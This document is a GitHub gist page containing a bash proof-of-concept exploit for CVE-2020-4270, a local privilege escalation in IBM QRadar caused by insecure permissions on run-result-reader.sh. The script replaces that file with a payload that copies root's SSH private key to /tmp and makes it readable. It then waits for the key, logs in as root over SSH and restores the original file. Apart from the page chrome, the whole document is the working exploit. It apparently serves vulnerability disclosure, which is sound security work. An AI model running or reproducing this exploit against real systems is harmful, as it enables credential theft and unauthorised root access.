Skip to content

Instantly share code, notes, and snippets.

@ykoster
Created April 16, 2020 07:43
Show Gist options
  • Save ykoster/877f7f8dfc0cb7d7fc697c09ffa51845 to your computer and use it in GitHub Desktop.
Save ykoster/877f7f8dfc0cb7d7fc697c09ffa51845 to your computer and use it in GitHub Desktop.
Local privilege escalation in QRadar due to run-result-reader.sh insecure file permissions (CVE-2020-4270) proof of concept
#!/bin/bash
trap cleanup INT
function cleanup()
{
if [ -f /tmp/run-result-reader.sh ]
then
/usr/bin/cat /tmp/run-result-reader.sh > /opt/qvm/iem/bin/run-result-reader.sh
/usr/bin/rm -f /tmp/run-result-reader.sh
fi
if [ -f /tmp/id_rsa ]
then
/usr/bin/rm -f /tmp/id_rsa
fi
}
if [ ! -f /tmp/run-result-reader.sh ]
then
/usr/bin/cp /opt/qvm/iem/bin/run-result-reader.sh /tmp/run-result-reader.sh
/usr/bin/cat > /opt/qvm/iem/bin/run-result-reader.sh << __EOF__
#!/bin/sh
/usr/bin/cp /root/.ssh/id_rsa /tmp/
/usr/bin/chown nobody.nobody /tmp/id_rsa
__EOF__
fi
echo "Please wait..."
while [ 1 ]
do
if [ -f /tmp/id_rsa ]
then
/usr/bin/ssh -i /tmp/id_rsa root@localhost
cleanup
exit 0
fi
/usr/bin/sleep 60
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment